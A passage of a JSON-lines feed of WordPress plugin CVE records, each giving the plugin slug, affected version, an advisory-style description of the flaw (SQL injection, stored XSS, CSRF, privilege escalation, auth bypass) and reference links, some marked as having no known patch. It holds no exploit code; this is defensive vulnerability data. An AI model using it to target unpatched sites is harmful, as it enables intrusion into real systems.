shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-multi-currency\\\/trunk\\\/frontend\\\/cache.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-multi-currency\\\/trunk\\\/frontend\\\/cache.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234505\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234505\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d630dd85-0169-4582-a8ae-54e5053425ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d630dd85-0169-4582-a8ae-54e5053425ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2074","slug":"advanced-google-recaptcha","versionImpact":"1.29","description":"The Advanced Google reCAPTCHA plugin for WordPress is vulnerable to generic SQL Injection via the \u2018sSearch\u2019 parameter in all versions up to, and including, 1.29 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries, particularly when the plugin\u2019s settings page hasn\u2019t been visited and its welcome message has not been dismissed. This issue can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/admin.php?rev=3248228#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/admin.php?rev=3248228#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/ajax.php?rev=3248228#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/setup.php?rev=3248228#L636\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-google-recaptcha\\\/trunk\\\/libs\\\/setup.php?rev=3248228#L636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262396\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262396\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-google-recaptcha\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-google-recaptcha\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963a9b30-9194-4abc-aa69-eb333cbddef3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963a9b30-9194-4abc-aa69-eb333cbddef3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3752","slug":"ableplayer","versionImpact":"1.2.1","description":"The Able Player, accessible HTML5 media player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018preload\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ableplayer\\\/trunk\\\/ableplayer.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ableplayer\\\/trunk\\\/ableplayer.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3281106%40ableplayer&new=3281106%40ableplayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3281106%40ableplayer&new=3281106%40ableplayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ableplayer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ableplayer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85c123ee-8de0-4800-b96b-68bb4d763560?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85c123ee-8de0-4800-b96b-68bb4d763560?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5565","slug":"hide-it","versionImpact":"1.0.1","description":"The Hide It plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hideit' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/hide-it\\\/tags\\\/1.0.1\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/hide-it\\\/tags\\\/1.0.1\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d62ac3-7980-4817-ab22-e5d0a6a10d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3d62ac3-7980-4817-ab22-e5d0a6a10d84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4786","slug":"videojs-html5-video-player-for-wordpress","versionImpact":"4.5.0","description":"The Video.js WordPress plugin through 4.5.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdad356f-cae4-4390-9a62-605201cee0c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdad356f-cae4-4390-9a62-605201cee0c0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1874","slug":"wp-data-access","versionImpact":"5.3.7","description":"The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L23\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f562e33-2aef-46f0-8a65-691155ede9e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f562e33-2aef-46f0-8a65-691155ede9e7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.8\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.7\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-data-access\\\/tags\\\/5.3.7\\\/WPDataRoles\\\/WPDA_Roles.php#L50\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4382","slug":"recently","versionImpact":"3.0.4","description":"The Recently plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the fetch_external_image() function in versions up to, and including, 3.0.4. This makes it possible for authenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92c3f26a-1a84-459a-874b-07dc83c9f42a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92c3f26a-1a84-459a-874b-07dc83c9f42a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-recently-multiple-vulnerabilities-3-0-4\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-recently-multiple-vulnerabilities-3-0-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2542693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2542693\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8297149-2de3-4e49-80f9-6ea59dea6bce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8297149-2de3-4e49-80f9-6ea59dea6bce?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3447","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.5","description":"The Active Directory Integration \/ LDAP Integration plugin for WordPress is vulnerable to LDAP Injection in versions up to, and including, 4.1.5. This is due to insufficient escaping on the supplied username value. This makes it possible for unauthenticated attackers to extract potentially sensitive information from the LDAP directory.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7553e8-e43d-4740-b2ee-e3d8dc351e53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd7553e8-e43d-4740-b2ee-e3d8dc351e53?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2928150%40ldap-login-for-intranet-sites&new=2928150%40ldap-login-for-intranet-sites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2928150%40ldap-login-for-intranet-sites&new=2928150%40ldap-login-for-intranet-sites&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1093","slug":"change-memory-limit","versionImpact":"1.0","description":"The Change Memory Limit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_logic() function hooked via admin_init in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update the memory limit.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/change-memory-limit\\\/trunk\\\/change-mem-limit.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/change-memory-limit\\\/trunk\\\/change-mem-limit.php#L104\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6883","slug":"event-espresso-decaf","versionImpact":"5.0.22.decaf","description":"The Event Espresso 4 Decaf \u2013 Event Registration Event Ticketing plugin for WordPress is vulnerable to limited unauthorized plugin settings modification due to a missing capability check on the saveTimezoneString and some other functions in all versions up to, and including, 5.0.22.decaf. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify some of the plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689abb68-0c19-4f89-91db-fd15ab8bca8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689abb68-0c19-4f89-91db-fd15ab8bca8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-espresso-decaf\\\/tags\\\/4.10.46.decaf\\\/admin_pages\\\/events\\\/Events_Admin_Page.core.php#L2800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-espresso-decaf\\\/tags\\\/4.10.46.decaf\\\/admin_pages\\\/events\\\/Events_Admin_Page.core.php#L2800\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10226","slug":"arconix-shortcodes","versionImpact":"2.1.13","description":"The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arconix-shortcodes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/arconix-shortcodes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176718\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176718\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11195","slug":"email-subscribe","versionImpact":"1.2.22","description":"The Email Subscription Popup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's print_email_subscribe_form shortcode in all versions up to, and including, 1.2.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8c18b0d-15fe-45d6-9915-85d38803c117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8c18b0d-15fe-45d6-9915-85d38803c117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.22\\\/wp-email-subscription.php#L2860\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribe\\\/tags\\\/1.2.22\\\/wp-email-subscription.php#L2860\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribe\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribe\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189989\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189989\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0522","slug":"likebot","versionImpact":"0.85","description":"The LikeBot  WordPress plugin through 0.85 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c2eed5a-f4d8-457d-a403-7eaced36c491\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4c2eed5a-f4d8-457d-a403-7eaced36c491\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5563","slug":"wp-addpub","versionImpact":"1.2.8","description":"The WP-Addpub plugin for WordPress is vulnerable to SQL Injection via the 'wp-addpub' shortcode in all versions up to, and including, 1.2.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-addpub\\\/trunk\\\/wp-addpub.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8945eed-eee4-4043-b6ab-d1ea553a4a23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8945eed-eee4-4043-b6ab-d1ea553a4a23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4785","slug":"video-sidebar-widgets","versionImpact":"6.1","description":"The Video Sidebar Widgets WordPress plugin through 6.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61873267-9f4f-4be5-bad6-95229ad54b99\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61873267-9f4f-4be5-bad6-95229ad54b99\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4381","slug":"ulisting","versionImpact":"1.6.6","description":"The uListing plugin for WordPress is vulnerable to authorization bypass via wp_route due to missing capability checks, and a missing security nonce, in the StmListingSingleLayout::import_new_layout method in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to change any WordPress option in the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff5755dc-2262-47f6-ac3a-6bca9529d088?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff5755dc-2262-47f6-ac3a-6bca9529d088?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3249","slug":"web3-authentication","versionImpact":"2.6.0","description":"The Web3 \u2013 Crypto wallet Login & NFT token gating plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.6.0. This is due to incorrect authentication checking in the 'hidden_form_data' function. This makes it possible for authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web3-authentication\\\/tags\\\/2.6.0\\\/classes\\\/common\\\/Web3\\\/controller\\\/class-moweb3flowhandler.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/web3-authentication\\\/tags\\\/2.6.0\\\/classes\\\/common\\\/Web3\\\/controller\\\/class-moweb3flowhandler.php#L198\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e30b62de-7280-4c29-b882-dfa83e65966b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e30b62de-7280-4c29-b882-dfa83e65966b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4418","slug":"custom-css","versionImpact":"2.0.7","description":"The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css-js-php\\\/trunk\\\/modules\\\/code\\\/model.code.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-css-js-php\\\/trunk\\\/modules\\\/code\\\/model.code.php#L85\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2497","slug":"userpro","versionImpact":"5.1.0","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to missing or incorrect nonce validation on the 'import_settings' function. This makes it possible for unauthenticated attackers to exploit PHP Object Injection due to the use of unserialize() on the user supplied parameter via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbb601ce-a884-4894-af13-dab14885c7eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbb601ce-a884-4894-af13-dab14885c7eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1088","slug":"password-protected-woo-store","versionImpact":"1.9","description":"The Password Protected Store for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive data including post titles and content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/password-protected-woo-store\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/password-protected-woo-store\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
